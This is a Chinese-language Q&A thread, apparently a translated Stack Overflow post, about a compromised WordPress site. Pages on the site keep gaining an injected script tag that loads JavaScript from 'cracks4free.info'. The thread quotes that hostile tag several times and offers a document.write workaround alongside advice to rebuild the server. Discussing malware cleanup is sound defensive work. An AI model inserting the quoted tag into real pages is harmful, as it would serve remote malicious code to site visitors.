我正在使用 wordpress 站点,并且我发现了一个恶意软件脚本,每当我尝试保存页面并单击所见即所得的文本面板时,恶意软件 javascript 标记都会自动添加到页面中。这是自动添加的脚本。
<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>
我试图通过以下代码删除 src 文件。但它没有用,脚本在 body 标签关闭之前最后执行。我尝试使用此脚本,但恶意软件脚本会在所有 javascript 加载后加载。这是我的代码。
<script type="text/javascript">
$("script[src='http://cracks4free.info/5/adds.js']").remove()
</script>
我需要删除这段代码,或者阻止这段代码通过 javasript、jquery、ajax 执行任何东西。只是想摆脱这个。谢谢
如果您的服务器遭到入侵,您需要重建它:
尝试使用 javascript 来清理内容不是解决方案。您已经安装了受损的 Wordpress,其他一些脚本小子添加自己的个人风格或发生更糟糕的事情只是时间问题。
似乎您的一个 Wordpress 插件易受攻击XSS(跨站点脚本),我建议您扫描网络以查找此插件的漏洞。您可以自己扫描插件的源代码,以查找盲目地将用户返回 javascript 而没有正确转义的内容。
你应该听从 Hamish 的建议,我的建议只是包含在这里,这样你就不会重新安装有问题的插件。
您可以在恶意软件脚本通过 JavaScript 执行之前注入新脚本标记的开头:
document.write("<script type='application/x-suppress'>");
基本上在这里你开始一个新<script>块但没有完成它,假设接下来发生的事情是恶意软件在最后插入它的块
<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>
最终结果将是
<script type='application/x-suppress'><script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>
将会发生的是浏览器将看到第一个<script>标签,并期望其中的所有内容都是 JavaScript 代码。当它试图解析脚本 ( <script type="text/javascript" src="http://cracks4free.info/5/adds.js" async="">) 时,它将导致 JavaScript 解析错误并且不执行任何操作。最后,您的<script>块</script>通过您的恶意软件提供的关闭。
真正的问题是,为什么会有这种恶意软件以及如何摆脱它?而不是试图解决它。